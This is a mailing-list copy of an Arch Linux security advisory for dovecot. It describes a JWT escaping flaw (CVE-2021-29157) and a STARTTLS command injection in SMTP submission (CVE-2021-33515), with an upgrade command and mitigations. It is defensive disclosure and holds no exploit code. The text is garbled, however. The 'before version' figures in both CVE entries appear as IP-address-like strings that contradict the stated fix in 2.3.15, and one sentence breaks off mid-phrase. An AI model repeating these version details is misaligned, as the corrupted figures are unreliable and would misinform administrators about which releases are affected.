[ASA-202106-56] dovecot: information disclosure
diabonas at archlinux.org
Thu Jun 24 16:20:51 UTC 2021
Arch Linux Security Advisory ASA-202106-56
Date : 2021-06-22
CVE-ID : CVE-2021-29157 CVE-2021-33515
Package : dovecot
Type : information disclosure
Remote : Yes
Link : https://security.archlinux.org/AVG-2087
The package dovecot before version 2.3.15-1 is vulnerable to
Upgrade to 2.3.15-1.
# pacman -Syu "dovecot>=2.3.15-1"
The problems have been fixed upstream in version 2.3.15.
CVE-2021-29157 can be mitigated by disabling local JWT validation in
oauth2, or using a different dict driver than fs:posix. No known
workaround exists for CVE-2021-33515.
- CVE-2021-29157 (information disclosure)
A security issue has been found in Dovecot before version 184.108.40.206. The
kid and azp fields in JWT tokens are not correctly escaped. This may be
used to supply attacker controlled keys to validate tokens in some
configurations. The attack requires an attacker to be able to write
files to the local disk. As a result, a local attacker can login as any
user and access their emails.
- CVE-2021-33515 (information disclosure)
A security issue has been found in Dovecot before version 220.127.116.11. An
on-path attacker could inject plaintext commands before the STARTTLS
negotiation that would be executed after STARTTLS finished with the
client. Only the SMTP submission service is affected. As a result, an
attacker can potentially steal user credentials and emails. The
attacker needs to have sending permissions on the submission server (a
valid username and password).
A remote authenticated attacker or a local attacker with write access
to the disk could disclose user credentials and emails.
-------------- next part --------------
A non-text attachment was scrubbed...
Size: 833 bytes
Desc: not available
More information about the arch-security